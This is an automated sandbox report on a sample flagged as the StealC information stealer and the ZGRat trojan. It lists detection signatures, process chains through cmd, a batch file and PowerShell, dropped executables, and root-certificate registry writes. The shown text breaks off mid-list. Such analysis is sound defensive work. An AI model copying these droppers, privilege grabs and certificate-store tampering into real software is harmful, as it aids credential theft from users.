Malware Analysis Report

2024-11-15 08:43

Sample ID 240510-bns5zsde97
Target 3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe
SHA256 3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7
Tags
stealc zgrat discovery execution rat spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7

Threat Level: Known bad

The file 3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe was found to be: Known bad.

Malicious Activity Summary

stealc zgrat discovery execution rat spyware stealer

Detect ZGRat V1

Stealc

ZGRat

Detects encrypted or obfuscated .NET executables

Detect binaries embedding considerable number of cryptocurrency wallet browser extension IDs.

Detect binaries embedding considerable number of MFA browser extension IDs.

Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers.

Blocklisted process makes network request

Downloads MZ/PE file

Executes dropped EXE

Loads dropped DLL

Checks computer location settings

Reads data files stored by FTP clients

Reads user/profile data of web browsers

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks installed software on the system

Program crash

Unsigned PE

Command and Scripting Interpreter: PowerShell

Enumerates physical storage devices

Checks SCSI registry key(s)

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Checks processor information in registry

Modifies system certificate store

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-10 01:17

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-05-10 01:17

Reported

2024-05-10 01:20

Platform

win7-20240508-en

Max time kernel

120s

Max time network

124s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1

Signatures

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1456 -s 236

Network

N/A

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-05-10 01:17

Reported

2024-05-10 01:20

Platform

win10v2004-20240426-en

Max time kernel

147s

Max time network

151s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4388 wrote to memory of 3328 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4388 wrote to memory of 3328 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4388 wrote to memory of 3328 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3328 -ip 3328

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3328 -s 624

Network

Country Destination Domain Proto
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 77.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-10 01:17

Reported

2024-05-10 01:20

Platform

win7-20240419-en

Max time kernel

145s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Stealc

stealer stealc

ZGRat

rat zgrat

Detect binaries embedding considerable number of MFA browser extension IDs.

Description Indicator Process Target
N/A N/A N/A N/A

Detect binaries embedding considerable number of cryptocurrency wallet browser extension IDs.

Description Indicator Process Target
N/A N/A N/A N/A

Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers.

Description Indicator Process Target
N/A N/A N/A N/A

Detects encrypted or obfuscated .NET executables

Description Indicator Process Target
N/A N/A N/A N/A

Downloads MZ/PE file

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\i1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u1t4.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u1t4.1.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks installed software on the system

discovery

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u1t4.1.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u1t4.1.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u1t4.1.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\u1t4.0.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\u1t4.0.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 0f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a2000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 C:\Users\Admin\AppData\Local\Temp\3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 190000000100000010000000fd960962ac6938e0d4b0769aa1a64e26030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a1d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e709000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030353000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6502000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 C:\Users\Admin\AppData\Local\Temp\3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6 C:\Users\Admin\AppData\Local\Temp\3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 0f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd C:\Users\Admin\AppData\Local\Temp\3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 19000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca61d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e4090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f006700690065007300000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a92000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd C:\Users\Admin\AppData\Local\Temp\3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 040000000100000010000000a923759bba49366e31c2dbf2e766ba870f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca619000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd C:\Users\Admin\AppData\Local\Temp\3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A C:\Users\Admin\AppData\Local\Temp\3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1576 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe C:\Windows\SysWOW64\cmd.exe
PID 1576 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe C:\Windows\SysWOW64\cmd.exe
PID 1576 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe C:\Windows\SysWOW64\cmd.exe
PID 1576 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe C:\Windows\SysWOW64\cmd.exe
PID 1676 wrote to memory of 2204 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1676 wrote to memory of 2204 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1676 wrote to memory of 2204 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1676 wrote to memory of 2204 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1676 wrote to memory of 860 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1676 wrote to memory of 860 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1676 wrote to memory of 860 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1676 wrote to memory of 860 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1676 wrote to memory of 2344 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i1.exe
PID 1676 wrote to memory of 2344 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i1.exe
PID 1676 wrote to memory of 2344 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i1.exe
PID 1676 wrote to memory of 2344 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i1.exe
PID 1676 wrote to memory of 2232 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1676 wrote to memory of 2232 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1676 wrote to memory of 2232 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1676 wrote to memory of 2232 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2344 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1t4.0.exe
PID 2344 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1t4.0.exe
PID 2344 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1t4.0.exe
PID 2344 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1t4.0.exe
PID 2344 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1t4.1.exe
PID 2344 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1t4.1.exe
PID 2344 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1t4.1.exe
PID 2344 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1t4.1.exe
PID 1304 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\u1t4.1.exe C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
PID 1304 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\u1t4.1.exe C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
PID 1304 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\u1t4.1.exe C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
PID 1304 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\u1t4.1.exe C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

Processes

C:\Users\Admin\AppData\Local\Temp\3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe

"C:\Users\Admin\AppData\Local\Temp\3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd" /c "C:\Users\Admin\AppData\Local\Temp\nst1CA6.tmp\est.bat"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
